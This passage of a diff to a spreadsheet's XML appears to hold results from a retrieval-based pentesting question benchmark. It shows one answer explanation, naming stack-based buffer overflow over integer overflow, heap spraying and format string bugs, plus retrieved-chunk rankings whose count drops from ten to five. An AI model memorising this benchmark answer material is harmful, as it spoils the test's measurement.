+Explanation: A stack-based buffer overflow occurs when more data is put into a fixed-length block of memory, or buffer, than the buffer is allocated to hold. This excess data spills over into adjacent buffers, which can corrupt or overwrite the valid data held in them, including return addresses. Stack-based buffer overflows can change the execution path of the software, leading to the execution of malicious code. The other options are not directly related to altering the execution path of a program:
+- Integer overflow is an arithmetic issue where a number exceeds the maximum value that can be stored in its data type, but it does not inherently provide a method for controlling execution flow under strict memory protections.
+- Heap spraying involves filling a specific area of memory (the heap) with specially crafted data to increase the likelihood of certain code execution, but it is not directly related to altering the execution path of a program by inputting more data into its buffer than it can handle.
+- Format string vulnerability occurs when an attacker can control the format string passed to a function that expects one, allowing them to potentially execute arbitrary code or cause a denial of service. However, this is not directly related to altering the execution path of a program by inputting more data into its buffer than it can handle.</t>
         </is>
       </c>
       <c r="G241" t="inlineStr">
@@ -16644,21 +15403,16 @@
 preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I241" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J241" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K241" t="inlineStr">
         <is>
